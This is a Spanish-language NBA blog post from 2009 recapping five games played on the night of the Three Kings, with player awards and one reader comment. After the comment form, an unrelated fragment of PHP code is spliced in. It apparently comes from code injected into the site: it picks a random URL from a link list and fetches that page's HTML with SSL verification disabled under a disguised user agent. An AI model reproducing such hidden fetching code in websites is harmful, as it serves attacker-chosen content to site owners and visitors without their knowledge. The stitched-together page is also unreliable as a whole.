La crónica (5/01/2009): Noche de Reyes

06 de January de 2009 por Viva_Dirk

La noche de reyes nos dejó cinco partidos como regalo en la NBA, vamos con ellos trás el resumen en imágenes:

En Miami vimos un partido muy disputado y serio, de esos que suele acabar ganando San Antonio, y así fue. Duncan encontró su principal apollo en George Hill que en 17 minutos anotó 15 puntos y capturó 7 rebotes, Manu y Parker estuvieron flojos y lo que faltó de su habitual aportación lo dieron Mason&Bonner con 11 puntos cada uno. Por los Heat el incombustible Wade esta vez si vió como los que en teoría deben ser sus lugartenientes aparecieron, Marion y Beasley anotaron 15 puntos cada uno y en el caso del novato se fue hasta los 12 rebotes; en resumen partido decidido en pequeños detalles, donde suelen estar mas listos los Spurs.

Vince Carter sigue empeñado en que le reconozcamos su gran campaña y de paso en que los Nets juegue play-offs, ayer ganaron a los Kings, y lo hicieron casi si Harris. El base solo jugó 18 minutos, veremos en que queda la cosa. Los aficionados de los Nets vieron ayer un buen partido de una de sus grandes esperanzas, el chino Yi secundó perfectamente a Carter, lo que sumado a la aportación del banquillo fue bastante para vencer a unos Kings que volvieron a tener a un sensacional Martin, un buen Jason Thompson y después la nada.

Palo para Toronto la derrota ante los Bucks, unos sin Calderón y los otros sin Bogut. Gran partido de los jugadores franquicia, ambos por encima de los 30 puntos y con alguien inesperado aportando mas de 20, pero como viene siendo habitual el banco de los Raptors no dio la cara y los suplentes de Milwaukee aportaron mas del doble de puntos. Esto deja a Toronto tocado a pesar de lo baratos que siguen estando los play-offs, ¿veremos un traspaso en la próxima semana?

Partido contra Golden State es partido que te vas a mas de 110 puntos, pero esta vez a los Jazzs les tocó sudar para arrancarles la victoria, incluso jugando en casa. Un Deron inmenso en la dirección permitió gran efectividad de sus hombres interiores mientras Millsap y Biendrins mantenian una feroz lucha bajo los aros, la cual se decantó en lo personal para el letón pero en lo colectivo para Utah que capturó 11 más. El dominio del rebote y un mayor cuidado de la pelota permitieron a los de Sloan llevarse el partido.

Pero no fue el de los Warriors el partido de mayor anotación, Denver le endosó 135 a los Pacers, que ‘solo’ llegaron a 115. Tres cuartos por encima de 35 puntos para Denver y uno de ¡¡47!! para Indiana, lo pasaron bien en el Pepsi Center. El partido sigue asustando por números: se repartieron 70 asistencias, anotaron 20 triples, tiraron 64 tiros libres y 180 tiros de campo, un autentico regalo de reyes para los aficionados de Denver. Eso si, en esta fiesta los Nuggets se fueron hasta un 58% en tiros de campo mientras que los Pacers no llegaron al 45%; siempre les traen mas cosas los reyes a unos que a otros.

PREMIOS

MVP: Tres candidaturas tenemos hoy, Deron Williams con su 25-15 y 9 de 15 en tiros, Michael Redd tirando de los Bucks con 35-6-4 y 11 de 20, y Vince Carter manteniendo a los Nets pese a la baja de Harris con 29-9-7 y 9 de 18, los tres lo merecen pero yo me quedo con Air Canada.

Rookie: Dia sin exhibiciones pero con buenas actuaciones. Empezamos por los habituales 10 puntos en 18 minutos de Hibbert, al cual su entrenador no le deja hacer nunca la 6ª falta, Koufos sigue ganandose minutos, ayer 11-5 y en el mismo partido 14 puntos de Morrow sin fallo desde la linea de 3, Ukic fue el único del banquillo de Toronto que alcanzó los 10 puntos, concretamente 11 y Jason Thompson le ganó la partida a Brook Lopez con un 12-6. En el duelo de la noche Beasley le ganó el duelo individual a Hill, pero este último ganó el partido, premio para el.

La Sorpresa: Yi Jianlian les gana por la mano a Charlie Villanueva y Andrea Bargnani, los dos últimos llevan varios años demostrado a la par su talento e irregularidad, y el primero ha dado buenas muestras pero va por el mismo camino, anoche los 3 anotaron mas de 20 puntos, a los que el chino sumó 13 rebotes, 3 asistencias y 2 tapones. No podemos dejar de mencionar los 16 puntos de Stephen Graham.

La Decepción: No es que esperemos ya muchas cosas de el, pero 6 puntos, 2 rebotes y 2 asistencias con 1 de 7 en tiros y dejando que Charlie Bell le quite minutos no es lo que se le supone a Richard Jefferson, aun así su equipo consiguió la victoria.

Mayor Esfuerzo en Vano: Se pueden disputar junto a Durant este premio a final de año, Kevin Martin y Danny Granger casi calcaron sus números anoche, 36-4-4 para Martin y una asistencia mas para Granger, premio compartido para ellos.

CONCLUSIONES

– Los ataques de entrenador son universales, ya sea en los técnicos mas experimentados como Popovich o los mas nuevos como Spoelstra, en este caso nos referimos a los rookies. Hill a pasado de jugar casi 35 minutos por noche a menos de 15 desde la vuelta de Parker y Ginobili, en el otro extremo Mario Chalmers disputa mas de 30 minutos pase lo que pase. Caso excepcional el de Hibbert que juega cerca de 20 minutos si en ese tiempo anota 10 puntos o mas, si no, juega 10. En fin, el que los entienda que se compre uno.

La pregunta del día: Ahora suena O´neal como posible traspasado en los Raptors. Ya comentábamos ayer que menos Bosh y Calde todos podían salir pero ¿Que necesitan los Raptors? Se habla de aleros, gente atlética,…

Os dejamos con las 5 mejores jugadas de la noche:

Comenta

Un comentario a esta entrada

  1. Hynreck dice:
    #1

    Bueno, sé que está mal que yo lo diga, pero Millsap sigue ampliando su record hasta los 18 doble-dobles consecutivos.

    El que sigue siendo una máquina es Kevin Martin, vaya como ha vuelto el payo, aunque la verdad, si no se las tira él quién se las va a tirar?

    Melo con la mano fracturada, baja indefinida… 🙁

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>